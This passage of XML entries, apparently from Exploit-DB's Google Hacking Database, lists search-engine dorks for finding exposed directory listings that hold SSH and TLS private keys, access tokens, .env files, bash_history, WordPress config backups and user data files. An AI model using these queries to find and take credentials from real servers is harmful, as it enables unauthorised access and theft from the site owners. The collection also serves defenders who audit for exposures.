<shortDescription>intitle:&quot;index of&quot; &quot;ssh_host_rsa_key&quot; + &quot;ssh_host_rsa_key.pub&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;ssh_host_rsa_key&quot; + &quot;ssh_host_rsa_key.pub&quot;
# Files Containing Juicy Info
# Date: 23/07/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ssh_host_rsa_key&quot; + &quot;ssh_host_rsa_key.pub&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ssh_host_rsa_key&quot; + &quot;ssh_host_rsa_key.pub&quot;</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7761</id>
<link>https://www.exploit-db.com/ghdb/7761</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;sysinfo&quot;</shortDescription>
<textualDescription># Google Dork:intitle:&quot;index of&quot; &quot;sysinfo&quot;
# Files Containing Juicy Info
# Date: 11/11/2021
# Exploit Author: Hognaglo komi Sergio</textualDescription>
<query>intitle:&quot;index of&quot; &quot;sysinfo&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;sysinfo&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Hognaglo komi Sergio</author>
</entry>
<entry>
<id>5956</id>
<link>https://www.exploit-db.com/ghdb/5956</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;syslog&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;syslog&quot;
This Google dork shows juicy information about the website and their system
logs.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 28 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;syslog&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;syslog&quot;</querystring>
<edb></edb>
<date>2020-04-28</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>7709</id>
<link>https://www.exploit-db.com/ghdb/7709</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;system32&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;system32&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;system32&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;system32&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7579</id>
<link>https://www.exploit-db.com/ghdb/7579</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;tar.xz&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;tar.xz&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;tar.xz&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;tar.xz&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7744</id>
<link>https://www.exploit-db.com/ghdb/7744</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;test.bat &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;test.bat &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;test.bat &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;test.bat &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7293</id>
<link>https://www.exploit-db.com/ghdb/7293</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;tls-cert.pem&quot; | &quot;tls-csr.pem&quot; | &quot;tls-key.pem&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;tls-cert.pem&quot; | &quot;tls-csr.pem&quot; | &quot;tls-key.pem&quot;
# Juicy information (private keys).
# Date: 23/07/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;tls-cert.pem&quot; | &quot;tls-csr.pem&quot; | &quot;tls-key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;tls-cert.pem&quot; | &quot;tls-csr.pem&quot; | &quot;tls-key.pem&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5975</id>
<link>https://www.exploit-db.com/ghdb/5975</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;token.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;token.json&quot;
# Juicy information including access tokens and more.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;token.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;token.json&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6076</id>
<link>https://www.exploit-db.com/ghdb/6076</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;token.txt&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;token.txt&quot;
Description: This google dork lists out sensitive tokens used on a web
server.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;token.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;token.txt&quot;</querystring>
<edb></edb>
<date>2020-05-12</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6061</id>
<link>https://www.exploit-db.com/ghdb/6061</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;token_info.json&quot; OR &quot;get_access_token.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;token_info.json&quot; OR &quot;get_access_token.json&quot;
# Juicy information.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;token_info.json&quot; OR &quot;get_access_token.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;token_info.json&quot; OR &quot;get_access_token.json&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7585</id>
<link>https://www.exploit-db.com/ghdb/7585</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;txdot&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;txdot&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;txdot&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;txdot&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7617</id>
<link>https://www.exploit-db.com/ghdb/7617</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;untitled&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;untitled&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;index of&quot; &quot;untitled&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;untitled&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7618</id>
<link>https://www.exploit-db.com/ghdb/7618</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;untitled&quot; &quot;wp-content&quot; intext:scanned</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;untitled&quot; &quot;wp-content&quot; intext:scanned
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;index of&quot; &quot;untitled&quot; &quot;wp-content&quot; intext:scanned</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;untitled&quot; &quot;wp-content&quot; intext:scanned</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>6069</id>
<link>https://www.exploit-db.com/ghdb/6069</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;user data.txt&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;user data.txt&quot;
Description: This Google dork lists out sensitive user data for a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;user data.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;user data.txt&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6095</id>
<link>https://www.exploit-db.com/ghdb/6095</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;userdata.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;userdata.json&quot;
Description: This google dork lists out websites with sensitive user data
json files.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;userdata.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;userdata.json&quot;</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8249</id>
<link>https://www.exploit-db.com/ghdb/8249</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;username.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;username.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Ranjeet Jaiswal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;username.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;username.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Ranjeet Jaiswal</author>
</entry>
<entry>
<id>5979</id>
<link>https://www.exploit-db.com/ghdb/5979</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;users.ini&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;users.ini&quot;
Description: This Google dork lists out sensitive user.ini files which
contain user parameters for a particular website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;users.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;users.ini&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6063</id>
<link>https://www.exploit-db.com/ghdb/6063</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;users.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;users.txt&quot;
# Juicy and sensitive information.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;users.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;users.txt&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8174</id>
<link>https://www.exploit-db.com/ghdb/8174</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Mohammed A.Siledar</textualDescription>
<query>Google dork submission: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</query>
<querystring>https://www.google.com/search?q=Google dork submission: intitle:&quot;index of&quot; &quot;users.yml&quot; | &quot;admin.yml&quot; | &quot;config.yml&quot;</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Mohammed A.Siledar</author>
</entry>
<entry>
<id>6176</id>
<link>https://www.exploit-db.com/ghdb/6176</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;var/log/&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;var/log/&quot;
Date: 2020-05-30
Exploit Author: Apurva Badave
Description: This Google dork shows juicy information about different logs used by
the website. Logs like connector.log, debug log,system.log, exception.log, etc
Thanks,
Apurva Badave
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;var/log/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;var/log/&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Apurva Badave</author>
</entry>
<entry>
<id>5904</id>
<link>https://www.exploit-db.com/ghdb/5904</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;vpn-config.*&quot;</shortDescription>
<textualDescription>This dork found some juicy information about the vpn-config file.
Google Dork : intitle:&quot;index of&quot; &quot;vpn-config.*&quot;
Author : Berat ISLER (root1x)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;vpn-config.*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;vpn-config.*&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>berat isler</author>
</entry>
<entry>
<id>5242</id>
<link>https://www.exploit-db.com/ghdb/5242</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;W3SVC1&quot;</shortDescription>
<textualDescription>MS IIS log files.
Change file name or it you want to search for more log
files: W3SVC2, W3SVC3 and so on.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;W3SVC1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;W3SVC1&quot;</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5566</id>
<link>https://www.exploit-db.com/ghdb/5566</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;web.config.txt&quot;</shortDescription>
<textualDescription>Files Containing Juicy info:
intitle:&quot;index of&quot; &quot;web.config.txt&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;web.config.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;web.config.txt&quot;</querystring>
<edb></edb>
<date>2019-10-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6054</id>
<link>https://www.exploit-db.com/ghdb/6054</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;web.log&quot; OR &quot;web.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;web.log&quot; OR &quot;web.logs&quot;
# Juicy information and sensitive directories, including usernames, unique
IDs and more.
# Date: 6/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;web.log&quot; OR &quot;web.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;web.log&quot; OR &quot;web.logs&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7535</id>
<link>https://www.exploit-db.com/ghdb/7535</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;workspace.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;workspace.xml&quot;
# Files Containing Juicy Info
# Date: 29/10/2021
# Exploit Author: Chinmay Divekar
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;workspace.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;workspace.xml&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>6228</id>
<link>https://www.exploit-db.com/ghdb/6228</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-admin.zip&quot;</shortDescription>
<textualDescription>*Dork:* intitle:&quot;index of&quot; &quot;wp-admin.zip&quot;
*Description:* This Google dork can be used to discover publicly available
ZIP files containing wp-admin.php file which has sensitive WordPress
Information.
*Author:* Hemant Patidar (HemantSolo)
*Linkedin: *https://www.linkedin.com/in/hemantsolo/
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-admin.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-admin.zip&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>8343</id>
<link>https://www.exploit-db.com/ghdb/8343</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-config.php.old&quot; | &quot;wp-config.php.backup&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;wp-config.php.old&quot; | &quot;wp-config.php.backup&quot;
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Qais Qais</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-config.php.old&quot; | &quot;wp-config.php.backup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-config.php.old&quot; | &quot;wp-config.php.backup&quot;</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Qais Qais</author>
</entry>
<entry>
<id>7563</id>
<link>https://www.exploit-db.com/ghdb/7563</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-content&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-content&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-content&quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7805</id>
<link>https://www.exploit-db.com/ghdb/7805</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-inc&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;wp-inc&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Chirag Prajapati</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-inc&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-inc&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Chirag Prajapati</author>
</entry>
<entry>
<id>5688</id>
<link>https://www.exploit-db.com/ghdb/5688</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-security-audit-log&quot;</shortDescription>
<textualDescription>Files containing juicy info:
intitle:&quot;index of&quot; &quot;wp-security-audit-log&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-security-audit-log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-security-audit-log&quot;</querystring>
<edb></edb>
<date>2020-01-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7883</id>
<link>https://www.exploit-db.com/ghdb/7883</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wp-upload&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;wp-upload&quot;
# Files Containing Juicy Info
# Date: 10/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wp-upload&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wp-upload&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6082</id>
<link>https://www.exploit-db.com/ghdb/6082</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;wpadmin-secure.htaccess&quot;</shortDescription>
<textualDescription>AUTHOR: ABHIJITH A
CATEGORY: Sensitive Directories
DESCRIPTION: intitle:&quot;index of&quot; &quot;wpadmin-secure.htaccess&quot;
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;wpadmin-secure.htaccess&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;wpadmin-secure.htaccess&quot;</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>ABHIJITH A</author>
</entry>
<entry>
<id>7555</id>
<link>https://www.exploit-db.com/ghdb/7555</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;XML &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;XML &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;XML &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;XML &quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7556</id>
<link>https://www.exploit-db.com/ghdb/7556</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;XML.Xerces &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;XML.Xerces &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;XML.Xerces &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;XML.Xerces &quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7640</id>
<link>https://www.exploit-db.com/ghdb/7640</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;_vti_inf.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;_vti_inf.html&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;_vti_inf.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;_vti_inf.html&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7955</id>
<link>https://www.exploit-db.com/ghdb/7955</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; (&quot;passenger.*.log&quot; | &quot;passenger.log&quot; | | &quot;production.log&quot; )</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; (&quot;passenger.*.log&quot; | &quot;passenger.log&quot; | |&quot;production.log&quot; )
# Files Containing Juicy Info
# Date: 24/06/2022
# Exploit Author: Matteo Canato
</textualDescription>
<query>intitle:&quot;index of&quot; (&quot;passenger.*.log&quot; | &quot;passenger.log&quot; | | &quot;production.log&quot; )</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; (&quot;passenger.*.log&quot; | &quot;passenger.log&quot; | | &quot;production.log&quot; )</querystring>
<edb></edb>
<date>2022-06-24</date>
<author>Matteo Canato</author>
</entry>
<entry>
<id>7711</id>
<link>https://www.exploit-db.com/ghdb/7711</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; *.py</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; *.py
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; *.py</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; *.py</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7722</id>
<link>https://www.exploit-db.com/ghdb/7722</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; *.xlsx</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; *.xlsx
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; *.xlsx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; *.xlsx</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>368</id>
<link>https://www.exploit-db.com/ghdb/368</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; +myd size</shortDescription>
<textualDescription>The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.</textualDescription>
<query>intitle:&quot;index of&quot; +myd size</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=intitle%3A%22index+of%22+%2Bmyd+%2Bsize</querystring>
<edb></edb>
<date>2004-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>385</id>
<link>https://www.exploit-db.com/ghdb/385</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index Of&quot; -inurl:maillog maillog size</shortDescription>
<textualDescription>This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server.</textualDescription>
<query>intitle:&quot;Index Of&quot; -inurl:maillog maillog size</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+Of%22+-inurl%3Amaillog++maillog+size</querystring>
<edb></edb>
<date>2004-07-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6335</id>
<link>https://www.exploit-db.com/ghdb/6335</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; ./bash_history</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; ./bash_history
# Juicy info and sensitive directories.
# Date: 30/06/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; ./bash_history</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; ./bash_history</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4702</id>
<link>https://www.exploit-db.com/ghdb/4702</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; .env</shortDescription>
<textualDescription>Files containing database and sometimes email passwords
Bruno Schmid
</textualDescription>
<query>intitle:&quot;index of&quot; .env</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; .env</querystring>
<edb></edb>
<date>2018-03-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7875</id>
<link>https://www.exploit-db.com/ghdb/7875</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; .ovpn</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; .ovpn
# Files Containing Juicy Info
# Date: 06/11/2021
# Dork Author: Chandan Sharma</textualDescription>
<query>intitle:&quot;index of&quot; .ovpn</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; .ovpn</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Chandan Sharma</author>
</entry>
<entry>
<id>5757</id>
<link>https://www.exploit-db.com/ghdb/5757</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /&quot;privatekey.txt&quot; OR &quot;private key.txt&quot;</shortDescription>
<textualDescription>Hi,
I have discovered this dork that can help us find private keys that are
saved in text file.
Juveria Banu.
</textualDescription>
<query>intitle:&quot;index of&quot; /&quot;privatekey.txt&quot; OR &quot;private key.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /&quot;privatekey.txt&quot; OR &quot;private key.txt&quot;</querystring>
<edb></edb>
<date>2020-03-02</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>5965</id>
<link>https://www.exploit-db.com/ghdb/5965</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /.ssh/id_rsa OR id_rsa.pub</shortDescription>
<textualDescription># Google Dork:
intitle:&quot;index of&quot; /.ssh/id_rsa OR id_rsa.pub
intitle:&quot;index of&quot; /ssh_host_ecdsa_key OR ssh_host_ecdsa_key.pub
intitle:&quot;index of&quot; /ssh_host_rsa_key OR ssh_host_rsa_key.pub
intitle:&quot;index of&quot; /ssh_host_key OR ssh_host_key.pub
intitle:&quot;index of&quot; /id_ecdsa OR id_ecdsa.pub
intitle:&quot;index of&quot; /.ssh/id_dsa OR id_dsa.pub
# RSA private and public keys.
# Date: 29/04/2020
